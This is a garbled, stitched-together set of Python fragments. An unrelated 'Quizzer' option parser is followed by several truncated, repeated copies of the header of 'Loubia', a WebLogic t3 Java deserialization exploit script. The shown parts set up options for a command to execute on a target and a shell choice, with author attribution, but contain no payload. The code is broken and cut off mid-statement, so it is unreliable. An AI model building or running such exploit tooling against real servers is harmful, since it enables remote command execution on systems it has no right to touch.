def parse(argv):
opts = OptionParser()
opts.banner = "Usage: Quizzer [ options ]"
opts.add_option("-h", "--help", "Show this message")
opts.add_option("-f", "--file",dest="filename",help="-f Quizz.json,Assessment.json", metavar="FILE")
opts.add_option("-m", "--file",dest="filename",help="-m Manifest.json", metavar="FILE")
opts.add_option("-q", "--quiet",action="store_false", dest="verbose", default=True,help="don't print status messages to stdout")
(options, args) = opts.parse_args()
import socket
import sys
import binascii
import time
import ssl
from optparse import OptionParser
parser = OptionParser(usage="usage: %prog hostname port [options]"
"",
version="%prog 1.0")
parser.banner = "Nervous WebLogic Unserialize Vulnerability Exploit\n"
parser.add_option("-c",
"--cmd",
action="store",
dest="payload",
default="",
help="Command to execute")
parser.add_option(
"-o",
"--os",
type='choice',
choices=['unix', 'win'],
action="store",
dest="os",
default="unix",
help="Target operating system (unix/win). Default is unix",
)
parser.add_option("-l",
"--shell",
type="choice",
choices=['sh', 'bash'],
# Loubia is a script to exploit the Java Unserialize vulnerability on t3 enabled backends (Weblogic server) # By Nassim Abbaoui ([email protected] / [email protected]) # Based on work presented here http://foxglovesecurity.com/2015/11/06/what-do-weblogic-websphere-jboss-jenkins-opennms-and-your-application-have-in-common-this-vulnerability/ # The original payload (malicious java serialized object) was generated using a modified version of ysoserial (https://github.com/frohoff/ysoserial) that allows using pipes/redirections in the command to execute import socket import sys import binascii import time import ssl from optparse import OptionParser parser = OptionParser(usage="usage: %prog hostname port [options]" "", version="%prog 1.0") parser.banner = "Loubia = t3 java unserialize exploitation script\n By Nassim Abbaoui ([email protected] / [email protected])\n" parser.add_option("-c", "--cmd", action="store", dest="payload", default="", help="Command to execute") parser.add_option( "-o", "--os", type='choice', choices=['unix', 'win'], action="store", dest="os", default="unix", help="Target operating system (unix/win). Default is unix",
#!/usr/bin/python # Loubia is a script to exploit the Java Unserialize vulnerability on t3 enabled backends (Weblogic server) # By Nassim Abbaoui ([email protected] / [email protected]) # Based on work presented here http://foxglovesecurity.com/2015/11/06/what-do-weblogic-websphere-jboss-jenkins-opennms-and-your-application-have-in-common-this-vulnerability/ # The original payload (malicious java serialized object) was generated using a modified version of ysoserial (https://github.com/frohoff/ysoserial) that allows using pipes/redirections in the command to execute import socket import sys import binascii import time import ssl from optparse import OptionParser parser = OptionParser(usage="usage: %prog hostname port [options]""", version="%prog 1.0") parser.banner = "Loubia = t3 java unserialize exploitation script\n By Nassim Abbaoui ([email protected] / [email protected])\n" parser.add_option("-c", "--cmd", action="store", dest="payload", default="", help="Command to execute") parser.add_option("-o", "--os", type='choice', choices=['unix', 'win'], action="store", dest="os", default="unix", help="Target operating system (unix/win). Default is unix",) parser.add_option("-l", "--shell", type="choice", choices=['sh', 'bash'],
